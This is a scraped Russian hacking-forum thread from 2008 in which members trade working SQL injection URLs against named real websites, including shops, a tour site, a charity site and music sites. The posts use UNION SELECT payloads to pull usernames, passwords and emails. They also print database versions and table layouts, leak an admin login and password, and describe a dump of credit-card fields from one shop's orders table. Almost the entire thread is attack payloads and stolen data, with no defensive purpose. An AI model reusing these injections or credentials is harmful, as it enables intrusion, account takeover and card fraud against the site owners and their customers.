ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #6881  
Старый 18.11.2008, 02:49
Аватар для ThreeD
ThreeD
Banned
Регистрация: 25.12.2006
Сообщений: 179
Провел на форуме:
2337678

Репутация: 354
По умолчанию

Четвёртая ветка, шоп.

http://www.worldfolkart.org/product.php?id=-2423'+union+select+1,2,3,concat_ws(0x3A3a,id,passw ord,username,email),5,6,7,8,9,10,11,12,13,14,15,16 ,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,3 3,34,35,36,37,38,39+from+users/*&cat_id=46&sub_id=312

1::flash62::wes::wes@joedesigns.com

Логинимся тут вроде
http://www.worldfolkart.org/cart_account.php

Картон )))

http://www.worldfolkart.org/product.php?id=-2423'+union+select+1,2,3,concat_ws(0x3A3a,cc_num,c c_name,cc_type),5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 ,35,36,37,38,39+from+orders/*&cat_id=46&sub_id=312

по count 4787 штук в базе, without cvv. Можете дампить, я плохими делами не занимаюсь.
Удачи )))
 
Ответить с цитированием

  #6882  
Старый 18.11.2008, 21:58
Аватар для Chaak
Chaak
Познавший АНТИЧАТ
Регистрация: 01.06.2008
Сообщений: 1,047
Провел на форуме:
5321514

Репутация: 3313


Отправить сообщение для Chaak с помощью ICQ
По умолчанию

Инъекция:
Цитата:
http://www.srpska.ru/article.php?nid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13--
Инфо:
Цитата:
Database Version: 5.0.60
Database name: db_ansimov_7
User name: dbu_ansimov_1@localhost
Структура:
Код:
categories:
   u_id
   cat_id
   cat_name
   cat_parent
   cat_descr

comm_members_list:
   comm_id
   u_id
   u_status
   comm_name

comments:
   comm_id
   comm_parent_id
   comm_parent_type
   comm_date
   comm_header
   comm_content
   comm_autor


Инъекция:
Цитата:
http://zvisti.com.ua/info.php?id=-1+union+select+1,2,3,4,5,666,7,8,9,10,11,12--
Инфо:
Цитата:
Database Version: 5.0.45
Database name: zvisti_db
User name: zvisti_user@localhost
Структуру лень раскрывать было...




Инъекция:
Цитата:
http://www.anshlagm.ru/a-info.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20--
Инфо:
Цитата:
Database Version: 4.1.22-log
Database name: melbis
User name: melbis@10.0.1.201

Последний раз редактировалось ChaaK; 18.11.2008 в 22:52..
 
Ответить с цитированием

  #6883  
Старый 18.11.2008, 22:10
Аватар для Neoveneficus
Neoveneficus
Reservists Of Antichat - Level 6
Регистрация: 10.04.2008
Сообщений: 299
Провел на форуме:
1199829

Репутация: 405
Отправить сообщение для Neoveneficus с помощью ICQ
По умолчанию

Код:
http://www.s7tour.ru/hotel.php?country=-1+union+select+1,version()/*

*** SQLBruter's report [ Tuesday 18th 0f November 2008 08:55:02 PM ] ***

[~] Names of tables bruteforce

http://www.s7tour.ru/hotel.php?country=-1 UNION SELECT 0,0 FROM hotel/*

http://www.s7tour.ru/hotel.php?country=-1 UNION SELECT 0,0 FROM news/*

http://www.s7tour.ru/hotel.php?country=-1 UNION SELECT 0,0 FROM poll_user/*
 
Ответить с цитированием

  #6884  
Старый 18.11.2008, 22:42
Аватар для foopi
foopi
Познающий
Регистрация: 26.10.2008
Сообщений: 50
Провел на форуме:
536527

Репутация: 62
Отправить сообщение для foopi с помощью ICQ
По умолчанию

http://www.s7tour.ru/hotel.php?country=-1+UNION+SELECT+1,concat_ws(0x3a,username,userpass) +FROM+poll_user/*
 
Ответить с цитированием

  #6885  
Старый 19.11.2008, 02:41
Аватар для plutus
plutus
Новичок
Регистрация: 03.11.2008
Сообщений: 25
Провел на форуме:
34070

Репутация: 20
По умолчанию

http://irannag hme.com/viewalbums.php?artistId=-1+UNION%20SELECT%201,concat_ws(0x3a3a,username,pas sword),3,4,5,6,7,8,9,10+from+users--

http://mp3hunga ma.com/music/viewalbums.php?artistId=-5+UNION%20SELECT%201,concat_ws(0x3a3a,username,pas sword,email),3,4,5,6,7,8,9,10+from+users--
 
Ответить с цитированием

  #6886  
Старый 19.11.2008, 11:02
Аватар для ThreeD
ThreeD
Banned
Регистрация: 25.12.2006
Сообщений: 179
Провел на форуме:
2337678

Репутация: 354
По умолчанию

https://www.keeperstop.com/pages.php?id=7+union+select+1,2,3,version(),5,6,7/*

5.0.44-log

Таблица registrations
 
Ответить с цитированием

  #6887  
Старый 19.11.2008, 12:41
Аватар для ThreeD
ThreeD
Banned
Регистрация: 25.12.2006
Сообщений: 179
Провел на форуме:
2337678

Репутация: 354
По умолчанию

http://www.chicgemsetc.com/press_article.php?id=-21+union+select+1,2,3,4,5,version(),7,8,9--

5.0.67-log

Ювелирка вроде.
 
Ответить с цитированием

  #6888  
Старый 19.11.2008, 19:06
Аватар для Chaak
Chaak
Познавший АНТИЧАТ
Регистрация: 01.06.2008
Сообщений: 1,047
Провел на форуме:
5321514

Репутация: 3313


Отправить сообщение для Chaak с помощью ICQ
По умолчанию

Инъекция:
Цитата:
http://www.digitalcharity.com/m.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13--
Код:
DB Version - 5.0.51a-log
DB User    - charity_charity@localhost
DB Name    - charity_charity
Таблицы:
Цитата:
beg_begs
beg_categories
beg_manager
beg_scam
beg_unwelcome
beg_users
categories
games
ratings
Таблица beg_users:
Цитата:
ID
beg_id
ip
Таблица beg_manager:
Цитата:
id
name
passwd
Таблица beg_unwelcome:
Цитата:
ID
email

Только что-то пароли не подходят

Email:
Цитата:
http://www.digitalcharity.com/m.php?id=-1+union+select+1,2,email,4,5,6,7,8,9,10,11,12,13+f rom+beg_unwelcome--
Пароль:
Цитата:
http://www.digitalcharity.com/m.php?id=-1+union+select+1,2,passwd,4,5,6,7,8,9,10,11,12,13+ from+beg_manager--
 
Ответить с цитированием

  #6889  
Старый 19.11.2008, 19:59
Аватар для peonix
peonix
Познающий
Регистрация: 09.11.2008
Сообщений: 34
Провел на форуме:
36308

Репутация: 2
По умолчанию

http://www.a-shop.ru/product_info.php?products_id=-1'+union+select+concat(username,char(58),password) +from+administrators/*

http://www.a-shop.ru/admin
bigmike : bigdent
 
Ответить с цитированием

  #6890  
Старый 20.11.2008, 02:14
Аватар для ThreeD
ThreeD
Banned
Регистрация: 25.12.2006
Сообщений: 179
Провел на форуме:
2337678

Репутация: 354
По умолчанию

Ещё одна ювелирка вроде.

http://www.atlasjewellery.com/enquiry.php?id=-147+union+select+1,2,3,4,5,6,version()/*

5.0.41-community-log

Последний раз редактировалось Constantine; 26.11.2008 в 19:34..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ